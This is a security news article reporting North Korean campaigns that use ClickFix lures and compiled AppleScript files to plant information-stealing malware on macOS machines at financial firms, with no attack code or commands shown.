North Korean Hackers Use AppleScript, ClickFix in Fresh macOS Attacks

North Korean hackers have been using various social engineering and evasion techniques in recently observed attacks targeting macOS users within financial organizations.

A campaign uncovered by Any.Run has relied on the infamous ClickFix technique to trick macOS users into installing information-stealing malware.

The hackers have been mounting the attacks over Telegram, targeting business leaders, often using the compromised accounts of people known to the victim, with fake meeting invitations.

The victims have been directed to websites mimicking Zoom, Microsoft Teams, or Google Meet, and prompted to “fix” a fake connection issue by copying and executing a command in the Terminal.

This has resulted in the execution of Go-based Mach-O binaries, part of a malware kit dubbed Mach-O Man and designed to collect credentials, system secrets such as Keychain entries, and browser sessions. The data has been exfiltrated over Telegram.

Another campaign, attributed by Microsoft to Sapphire Sleet, a state-sponsored group active since at least 2020, has relied on AppleScript for code execution and detection evasion, but has been leading to the same outcome: sensitive data exfiltration.

The hackers have been using fake recruiter profiles on online platforms to engage in conversations with the victims and to invite them to technical interviews.

During the fake interviews, the victims have been asked to install malware masquerading as a video conferencing tool or software developer kit (SDK) update.

The campaign does not involve ClickFix, which relies on the victims’ willingness to copy the commands leading to malware infection. Instead, the downloaded file, a compiled AppleScript, would automatically open in macOS Script Editor to execute embedded arbitrary shell commands.

As part of the complex infection chain, multiple AppleScript payloads would be executed, ultimately leading to the deployment of several backdoors. The attack also focuses on achieving persistence and on privilege escalation.

The deployed payloads were designed to perform system reconnaissance, enumerate installed applications, and harvest Telegram data, browser profiles and the associated databases, Keychain databases, cryptocurrency wallets, SSH keys, shell history, the Apple Notes database, and system logs.

Related: North Korean Hackers Take Over Victims’ Systems Using Zoom Meeting

Related: $290 Million Kelp DAO Crypto Heist Blamed on North Korea

Related: Two North Korean IT Worker Scheme Facilitators Jailed in the US

Related: North Korean Hackers Target High-Profile Node.js Maintainers